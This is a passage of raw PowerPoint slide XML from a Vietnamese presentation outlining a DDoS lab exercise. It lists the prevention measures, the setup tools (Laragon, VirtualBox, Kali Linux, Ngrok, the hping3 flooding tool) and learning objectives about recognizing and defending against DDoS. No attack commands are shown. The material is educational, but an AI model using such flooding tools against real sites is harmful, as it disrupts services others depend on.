              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cách</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ngăn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chặn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tường</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lửa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Thiết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hạn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chế</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gói</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tin.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="265060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B910-1AA6-4DF4-AB80-9890D11CB9AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bước</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chuẩn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FC7F16F-8D75-439D-9D55-CD2594D4D3BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Laragon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhằm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hợp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pháp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vitualbox</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máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ảo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</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pháp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</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pháp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ngrok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tạo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đường</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hầm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>giúp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khai</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>riêng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hợp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pháp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hping3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ddos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thuộc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2340992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4D3-2345-4E8B-979E-EB20D0FD5138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tiêu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2643C13E-403F-45AB-8B76-AC749CFABDC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tìm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiểu</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ddos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tìm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiểu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cuộc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tìm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiểu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cách</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kiểm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nhận</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>biết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dấu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khi</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ddos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Xem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gói</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tin, request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gửi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chủ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nhận</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>biết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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người</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Rút</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cách</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ngăn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chặn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phòng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thủ</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thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> qua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>việc</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cuộc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> DDOS.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165319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p:cTn id="4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p:cTn id="5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p:cTn id="6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p:cTn id="7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7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7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7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6E51-208D-4959-B34B-9D2CFB338F59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
